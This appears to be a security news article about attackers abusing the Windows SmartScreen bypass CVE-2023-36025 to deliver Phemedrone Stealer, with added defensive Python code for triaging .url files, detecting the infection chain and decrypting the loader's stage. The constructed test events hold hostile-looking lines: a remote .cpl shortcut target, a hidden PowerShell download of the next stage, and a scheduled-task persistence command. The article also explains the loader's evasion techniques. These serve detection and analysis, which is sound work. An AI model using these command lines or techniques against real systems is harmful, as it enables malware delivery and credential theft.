Sunday, March 3, 2024

Hackers Exploiting Windows Defender SmartScreen Flaw to Hijack Computers

Threat actors are abusing Windows Defender SmartScreen to get malicious content past the warning users would normally see: they craft files and lure pages that look legitimate and rely on a SmartScreen bypass so that no prompt appears when the file is opened.

Evading SmartScreen removes one of the last barriers before attacker-controlled code runs on the victim's machine, which greatly raises the odds that the payload executes.

The bypass is almost always paired with social engineering, since the user still has to be persuaded to open the file in the first place.

Recently, researchers at Trend Micro reported that threat actors are actively exploiting a Windows Defender SmartScreen flaw, tracked as CVE-2023-36025, to compromise Windows machines.

Flaw profile

CVE ID: CVE-2023-36025

Description: Windows SmartScreen Security Feature Bypass Vulnerability

Released: Nov 14, 2023

Last updated: Nov 22, 2023

CVSS 3.1 score: 8.8 (base) / 8.2 (temporal)

Hackers Exploiting Windows Defender SmartScreen

CVE-2023-36025 in Microsoft Windows Defender SmartScreen lets an attacker craft an Internet Shortcut (.url) file that opens without triggering the SmartScreen warning, so the file is free to fetch and run a remote payload.

Proof-of-concept code shared on social media was quickly folded into malware campaigns, including one delivering the Phemedrone Stealer payload.



To deliver Phemedrone Stealer, the threat actors host malicious Internet Shortcut (.url) files on Discord or cloud storage services, usually behind URL shorteners that hide the real destination.

Because of CVE-2023-36025, the crafted .url file opens without the SmartScreen prompt. When executed, it connects to the attacker's server and downloads a Control Panel item (.cpl), which Windows then runs without any further warning.
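A .url file is a small INI-style text file, so the first triage step on a suspected lure is simply to parse it and look at where its targets point. The following is an added example (not code from the original article or from Trend Micro) that parses the `[InternetShortcut]` section and flags a target that resolves to an executable type such as a .cpl on a remote host; the sample shortcut contents, the 203.0.113.10 address and the share path are constructed placeholders, and the check is generalised to other executable extensions and to a remote `IconFile` entry beyond the .cpl case the article describes.

```python
import configparser
import posixpath
from urllib.parse import urlparse

# Extensions Windows will execute (or that lead to execution) when the target is
# opened. A .cpl is a Control Panel item: a DLL that control.exe loads and runs.
EXECUTABLE_EXTS = {".cpl", ".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs",
                   ".js", ".hta", ".lnk", ".msi", ".ps1"}

# Constructed samples (not artefacts from the campaign): an ordinary web
# shortcut, and one shaped like the lure, pointing at a .cpl on a remote share.
BENIGN_URL = """[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""

SUSPICIOUS_URL = r"""[InternetShortcut]
URL=file://203.0.113.10@80/share/update.cpl
IconFile=\\203.0.113.10@80\share\icon.ico
IconIndex=0
"""


def parse_url_file(text):
    """Parse the INI-style .url format and return the fields that matter for triage."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        raise ValueError("not an Internet Shortcut file")
    sec = cp["InternetShortcut"]
    return {k: sec.get(k, "").strip() for k in ("url", "iconfile", "workingdirectory")}


def is_remote(target):
    """True when the target is fetched from another host: UNC path, file:// with a host, or a URL."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    p = urlparse(target)
    if p.scheme == "file":
        return p.netloc not in ("", "localhost")
    return p.scheme in ("http", "https", "ftp", "smb")


def extension(target):
    """Lower-case extension of the target's path component ('' when there is none)."""
    p = urlparse(target)
    path = p.path if p.scheme in ("file", "http", "https", "ftp", "smb") else target
    return posixpath.splitext(path.rstrip("/"))[1].lower()


def triage_url_file(text):
    """Return the parsed fields plus a list of human-readable findings."""
    fields = parse_url_file(text)
    findings = []
    for field in ("url", "iconfile"):
        target = fields[field]
        if not target:
            continue
        remote, ext = is_remote(target), extension(target)
        if ext in EXECUTABLE_EXTS:
            where = "remote" if remote else "local"
            findings.append(f"{field} points at a {where} executable ({ext}): {target}")
        elif field == "iconfile" and remote:
            findings.append(f"iconfile is fetched from a remote host: {target}")
    return {"fields": fields, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_URL), ("suspicious", SUSPICIOUS_URL)):
        print(label, triage_url_file(sample)["findings"])
```

The same parser can be pointed at every .url file in a mail quarantine or download directory; anything whose target is an executable type on a host you do not control deserves a second look regardless of whether SmartScreen would have prompted.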

Infection chain (Source – Trend Micro)

This is MITRE ATT&CK T1218.002 (System Binary Proxy Execution: Control Panel): the Windows Control Panel process loads the .cpl, and the malicious DLL inside it acts as a loader. That DLL invokes PowerShell to download and execute the next stage, an obfuscated loader hosted on GitHub under the name "DATA3.txt".
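The stages described above leave a distinctive process tree: control.exe (or the rundll32.exe it spawns with Shell32.dll,Control_RunDLL) loading a .cpl from somewhere other than the system directories, PowerShell running underneath that, and later a scheduled-task creation from the sideloading host. The following added example, written for this article and not taken from Trend Micro, runs three such rules over constructed process-creation events in the shape of Sysmon Event ID 1; the PIDs, user name, 203.0.113.10 share and the GitHub path are placeholders.

```python
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# A .cpl argument, quoted (may contain spaces) or bare.
CPL_RE = re.compile(r'"([^"]+\.cpl)"|(\S+\.cpl)', re.IGNORECASE)

# Constructed events (not telemetry from the campaign): the chain from the
# article followed by two benign look-alikes.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # the .url target: a .cpl on a remote share, opened via control.exe -> rundll32.exe
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" "\\203.0.113.10@80\share\update.cpl"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "\\203.0.113.10@80\share\update.cpl"'},
    # the loader DLL inside the .cpl hands off to PowerShell for the next stage
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr https://raw.githubusercontent.com/example/repo/main/DATA3.txt"'},
    # the sideloading host from the ZIP, then persistence via a scheduled task
    {"pid": 500, "ppid": 400, "image": r"C:\Users\victim\AppData\Local\Temp\WerFaultSecure.exe",
     "cmdline": "WerFaultSecure.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn Updater /tr "C:\Users\victim\AppData\Local\Temp\WerFaultSecure.exe" /sc minute /mo 90'},
    # benign noise: a built-in Control Panel item and an interactive PowerShell
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl'},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]


def basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Parent, grandparent, ... of pid, guarding against PID-reuse loops."""
    chain, seen, ev = [], {pid}, by_pid.get(pid)
    while ev is not None:
        parent = by_pid.get(ev["ppid"])
        if parent is None or parent["pid"] in seen:
            break
        seen.add(parent["pid"])
        chain.append(parent)
        ev = parent
    return chain


def detect(events):
    """Return (pid, rule, detail) tuples for the infection chain described above."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmdline"]
        parents = [basename(a["image"]) for a in ancestors(by_pid, e["pid"])]

        # T1218.002: a Control Panel item loaded from outside the system directories.
        if name in ("control.exe", "rundll32.exe"):
            m = CPL_RE.search(cmd)
            if m:
                path = m.group(1) or m.group(2)
                if not path.lower().startswith(SYSTEM_DIRS):
                    alerts.append((e["pid"], "cpl-outside-system-dir", path))

        # PowerShell descended from Control Panel proxy execution (the loader's download step).
        if name in ("powershell.exe", "pwsh.exe") and {"control.exe", "rundll32.exe"} & set(parents):
            alerts.append((e["pid"], "powershell-under-control-panel", cmd))

        # Persistence: schtasks /create issued directly by the sideloading host.
        if name == "schtasks.exe" and "/create" in cmd.lower() and parents[:1] == ["werfaultsecure.exe"]:
            alerts.append((e["pid"], "schtasks-from-werfaultsecure", cmd))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(pid, rule, detail)
```

The first rule is the one worth deploying broadly: legitimate Control Panel items live under System32 or SysWOW64, so a .cpl path anywhere else (a temp folder, a user profile, a UNC or WebDAV share) is rare enough to review by hand. The other two rules are tuned to this campaign's binaries and should be treated as examples of the pattern rather than as finished detections.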

Researchers also found that the PowerShell commands download a ZIP archive from GitHub containing three files.

Here below we have mentioned those three files:-

WerFaultSecure.exe, a legitimate Windows binary used as the sideloading host

wer.dll, the malicious DLL that the host sideloads

secure.pdf, the RC4-encrypted second-stage loader
wer.dll decrypts and runs the second-stage loader and establishes persistence by creating scheduled tasks. API hashing, string encryption and VMProtect packing make the DLL harder to analyse.

The loader is sideloaded through DLL spoofing: the legitimate WerFaultSecure.exe loads the malicious wer.dll placed beside it and calls its WerpSetExitListeners export, which is where the malicious code begins.

Imports are resolved dynamically, with API names stored as CRC-32 hashes rather than plaintext strings. Strings are protected with an XOR-based scheme whose keys are generated at runtime. The second stage is stored in secure.pdf and decrypted with RC4 through the undocumented SystemFunction032 API.

The loader allocates memory with AllocADsMem and ReallocADsMem, copies the decrypted stage in, and uses VirtualProtect to mark the region Execute-Read-Write. It then redirects execution to the second stage by passing its entry point to CryptCATCDFOpen as an API callback.
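Two of the tricks above are routine to unwind once the mechanism is known: hashed imports are resolved by hashing candidate export names yourself and matching, and SystemFunction032 is plain RC4, so a standard RC4 routine decrypts whatever it produced. The following added example (written for this article, not code from Trend Micro or from the loader) covers both the CRC-32 hashing described in the import-resolution paragraph and the RC4 decryption of the secure.pdf stage. It assumes the plain CRC-32 polynomial over the ASCII export name with no seed or final-XOR changes; the candidate API list, the stage key and the "STAGE2" marker used to sanity-check a decryption are all constructed placeholders.

```python
import zlib

# Constructed list of export names the loader is described as using; in practice
# you would feed in the full export tables of kernel32, advapi32, activeds and
# wintrust and let the hash lookup do the matching.
CANDIDATE_APIS = [
    "VirtualProtect", "VirtualAlloc", "LoadLibraryA", "GetProcAddress",
    "SystemFunction032", "AllocADsMem", "ReallocADsMem", "CryptCATCDFOpen",
]


def api_hash(name):
    """Standard CRC-32 of the ASCII export name.

    Assumption: the loader uses the unmodified CRC-32 polynomial with no case
    folding and no trailing NUL. Real samples sometimes change the seed or the
    final XOR; if hashes pulled from the binary do not resolve, adjust here."""
    if isinstance(name, str):
        name = name.encode("ascii")
    return zlib.crc32(name) & 0xFFFFFFFF


def build_hash_table(names=CANDIDATE_APIS):
    return {api_hash(n): n for n in names}


def resolve_api(h, table=None):
    """Map a 32-bit hash recovered from the loader back to an export name, or None."""
    return (table or build_hash_table()).get(h)


def rc4(key, data):
    """RC4 key scheduling plus keystream generation; encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed stand-in for secure.pdf: a marker plus filler, RC4-encrypted with a
# placeholder key. The real file carries Donut shellcode and the real key is
# recovered from wer.dll; the marker exists only so a wrong key is detectable here.
STAGE_KEY = bytes.fromhex("5ec3e7d0a1b2c3d4")
STAGE_PLAINTEXT = b"STAGE2" + bytes(range(64))
ENCRYPTED_STAGE = rc4(STAGE_KEY, STAGE_PLAINTEXT)


def decrypt_stage(blob, key, marker=b"STAGE2"):
    """Decrypt a secure.pdf-style blob and check it before anything would be copied into executable memory."""
    plain = rc4(key, blob)
    return plain if plain.startswith(marker) else None


if __name__ == "__main__":
    table = build_hash_table()
    for h in sorted(table):
        print(f"{h:08x}  {table[h]}")
    print(decrypt_stage(ENCRYPTED_STAGE, STAGE_KEY)[:6], decrypt_stage(ENCRYPTED_STAGE, b"wrong"))
```

When working a real sample, pull the 32-bit constants passed to the loader's resolver out of the disassembly, run them through `resolve_api`, and widen the candidate list with the export tables of every DLL the loader touches until they all resolve; the key for `rc4` is whatever buffer the sample hands to SystemFunction032 as its second argument.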

The second stage is Donut, an open-source shellcode loader that can execute various file types (such as PE files, DLLs and .NET assemblies) directly in memory.

Applications & Services Targeted

Here below, we have mentioned the applications and services targeted by the malware:-

Chromium-based browsers

Crypto wallets

System information

Although Microsoft has patched CVE-2023-36025, threat actors continue to exploit it on unpatched systems to bypass Windows Defender SmartScreen and deliver malware such as Phemedrone Stealer.

This case illustrates how readily open-source malware and public exploit code are combined, and underlines the need for timely patching and layered security controls.
